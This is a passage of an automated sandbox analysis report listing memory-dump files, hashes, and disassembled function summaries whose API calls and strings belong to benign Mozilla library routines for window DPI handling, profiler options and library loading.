Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56eb546117dcff2f00e022e6e617f54a11c95c15941eca94aa138725ca2e8ece
Instruction ID: a1ec1793625357ac7f651ab94442765400ca5fbdaa42691f6f752926f8064a83
Opcode Fuzzy Hash: 56eb546117dcff2f00e022e6e617f54a11c95c15941eca94aa138725ca2e8ece
Instruction Fuzzy Hash: C7414CF3A082105BF7049E2DDC95737F7DAEBD4720F2A863DEA8487784E9755C458282

Function 00E690CB Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a21f0ea4f78e07bd47f44b0d605294c32482cce99346ede0ee6322763f479e3
Instruction ID: f8424a26f29e19838770b09cd4ddc330ffd58e3ece8e8af2c53c84a0a4b8a527
Opcode Fuzzy Hash: 1a21f0ea4f78e07bd47f44b0d605294c32482cce99346ede0ee6322763f479e3
Instruction Fuzzy Hash: 904135F3B183049BE304AE6DECC57AAB7E5EB98720F0A493DD6C5C3780E57068058296

Function 00E58D69 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e383c6a103d04082ea3601da4c22869776c9daa19d59c5c5436fe3f4e3b0ae9
Instruction ID: ee286101c316215c606f70776a4325c95c1ae2519dda8d13eafc3ee285de6b4a
Opcode Fuzzy Hash: 6e383c6a103d04082ea3601da4c22869776c9daa19d59c5c5436fe3f4e3b0ae9
Instruction Fuzzy Hash: AC4124B3EA43294BE3146C7CEC89326BA81DB54710F1A463DDF94E7784E8BD9D0942C9

Function 00E63156 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b31b9421177b1c33ec7ce533145956b4c27f6ec0b64768dd34942f7104ebeaec
Instruction ID: c8eafda07e7661e6d1598c8529055da32054a637bdb52f99968f6744b3780f07
Opcode Fuzzy Hash: b31b9421177b1c33ec7ce533145956b4c27f6ec0b64768dd34942f7104ebeaec
Instruction Fuzzy Hash: 9A4189B3A542248BF3087D79EC597AABA969780330F1B453DCA99877C4ED3D080682C5

Function 00E76661 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20193c781067ec33c43be7759b68c114b5ed1a47b7c5cc8e304394c0cb9c8de8
Instruction ID: 358a609f7f3f106dad49243bb77b15011d3cc0b8e3d5cc23ff73d974946cf82e
Opcode Fuzzy Hash: 20193c781067ec33c43be7759b68c114b5ed1a47b7c5cc8e304394c0cb9c8de8
Instruction Fuzzy Hash: E831D5F260C2049FD3006E6EEC41B6AB7E9EFD4624F1A443DD7C4C3740E97998528697

Function 00AC9750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 6CB355F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6CB0E1A5), ref: 6CB35606
LoadLibraryW.KERNEL32(gdi32,?,6CB0E1A5), ref: 6CB3560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CB35633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CB3563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CB3566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CB3567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CB35696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CB356B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CB356CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CB356E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CB356FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CB35716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CB3572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CB35748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CB35761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CB3577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CB35793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CB357A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CB357BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CB357D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CB357EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CB357FF

Strings

EnableNonClientDpiScaling, xrefs: 6CB35666
GetMonitorInfoW, xrefs: 6CB357A2
GetThreadDpiAwarenessContext, xrefs: 6CB3562D
GetDpiForWindow, xrefs: 6CB35690
ReleaseDC, xrefs: 6CB35742
SetWindowLongPtrW, xrefs: 6CB357B7
RegisterClassW, xrefs: 6CB356AC
MonitorFromWindow, xrefs: 6CB3578D
ShowWindow, xrefs: 6CB356DE
GetSystemMetricsForDpi, xrefs: 6CB35677
gdi32, xrefs: 6CB3560A
AreDpiAwarenessContextsEqual, xrefs: 6CB35637
CreateWindowExW, xrefs: 6CB356C5
CreateSolidBrush, xrefs: 6CB357E4
user32, xrefs: 6CB35601
LoadIconW, xrefs: 6CB3575B
LoadCursorW, xrefs: 6CB35774
SetWindowPos, xrefs: 6CB356F7
GetWindowDC, xrefs: 6CB35710
FillRect, xrefs: 6CB35729
DeleteObject, xrefs: 6CB357F9
StretchDIBits, xrefs: 6CB357CC

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: fbdd52dae88394bd231ef48ee0a1cc39c8b2f521ffb4e257a5c9f54b8d5f98c0
Instruction ID: 76744545956afcfbcb1f0e4a3133d43e990dd3f5648c51c444d916005310e79f
Opcode Fuzzy Hash: fbdd52dae88394bd231ef48ee0a1cc39c8b2f521ffb4e257a5c9f54b8d5f98c0
Instruction Fuzzy Hash: 7051B174701392ABEB009F35ED0492A7BFCEB062567949829ED16E3A46EB70CD01CF65

Function 6CB1CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6CAE582D), ref: 6CB1CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6CAE582D), ref: 6CB1CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6CB4FE98,?,?,?,?,?,6CAE582D), ref: 6CB1CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6CAE582D), ref: 6CB1CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6CAE582D), ref: 6CB1CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6CAE582D), ref: 6CB1CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6CAE582D), ref: 6CB1CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6CB1CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6CB1CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6CB1CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6CB1CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6CB1CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6CB1CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6CB1CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6CB1CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6CB1CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6CB1CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6CB1CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6CB1CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6CB1CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6CB1CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6CB1CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6CB1CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6CB1CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6CB1CE8A

Strings

noiostacks, xrefs: 6CB1CCBE
nostacksampling, xrefs: 6CB1CD7C
fileioall, xrefs: 6CB1CCA8
notimerresolutionchange, xrefs: 6CB1CE00
unregisteredthreads, xrefs: 6CB1CE58
stackwalk, xrefs: 6CB1CCF8
ipcmessages, xrefs: 6CB1CDBE
processcpu, xrefs: 6CB1CE6E
jsallocations, xrefs: 6CB1CD0E
screenshots, xrefs: 6CB1CCD4
java, xrefs: 6CB1CC37
markersallthreads, xrefs: 6CB1CE42
seqstyle, xrefs: 6CB1CCE6
cpuallthreads, xrefs: 6CB1CE16
mainthreadio, xrefs: 6CB1CC7C
fileio, xrefs: 6CB1CC92
leaf, xrefs: 6CB1CC66
preferencereads, xrefs: 6CB1CD92
samplingallthreads, xrefs: 6CB1CE2C
nativeallocations, xrefs: 6CB1CDA8
Unrecognized feature "%s"., xrefs: 6CB1CEA0
default, xrefs: 6CB1CC21
audiocallbacktracing, xrefs: 6CB1CDD4
power, xrefs: 6CB1CE84

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 64fdbb95b70431a5c42b08f02dc481ca0ded3ee0114a9b788eca99ca717e8b7b
Instruction ID: 9ea911204b9565cad7785425ee4240af48b15e934322a5be607f6e1c8bb39543
Opcode Fuzzy Hash: 64fdbb95b70431a5c42b08f02dc481ca0ded3ee0114a9b788eca99ca717e8b7b
Instruction Fuzzy Hash: 0251F9C1A5E2F532FE0039152D11BAF150AEF5325AF10803AED0AA2F84FF15E61D96B7

Function 6CAE4470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CAE4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CAE44B2,6CB5E21C,6CB5F7F8), ref: 6CAE473E
Part of subcall function 6CAE4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CAE474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6CAE44BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6CAE44D2
InitOnceExecuteOnce.KERNEL32(6CB5F80C,6CADF240,?,?), ref: 6CAE451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6CAE455C
LoadLibraryW.KERNEL32(?), ref: 6CAE4592
InitializeCriticalSection.KERNEL32(6CB5F770), ref: 6CAE45A2
moz_xmalloc.MOZGLUE(00000008), ref: 6CAE45AA
moz_xmalloc.MOZGLUE(00000018), ref: 6CAE45BB
InitOnceExecuteOnce.KERNEL32(6CB5F818,6CADF240,?,?), ref: 6CAE4612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CAE4636
LoadLibraryW.KERNEL32(user32.dll), ref: 6CAE4644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6CAE466D
VerSetConditionMask.NTDLL ref: 6CAE469F
VerSetConditionMask.NTDLL ref: 6CAE46AB
VerSetConditionMask.NTDLL ref: 6CAE46B2
VerSetConditionMask.NTDLL ref: 6CAE46B9
VerSetConditionMask.NTDLL ref: 6CAE46C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CAE46CD
GetModuleHandleW.KERNEL32(00000000), ref: 6CAE46F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6CAE46FD

Strings

kernel32.dll, xrefs: 6CAE44CD
user32.dll, xrefs: 6CAE4557, 6CAE463F
l, xrefs: 6CAE4578
NativeNtBlockSet_Write, xrefs: 6CAE46F7
WRusr.dll, xrefs: 6CAE44B5

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
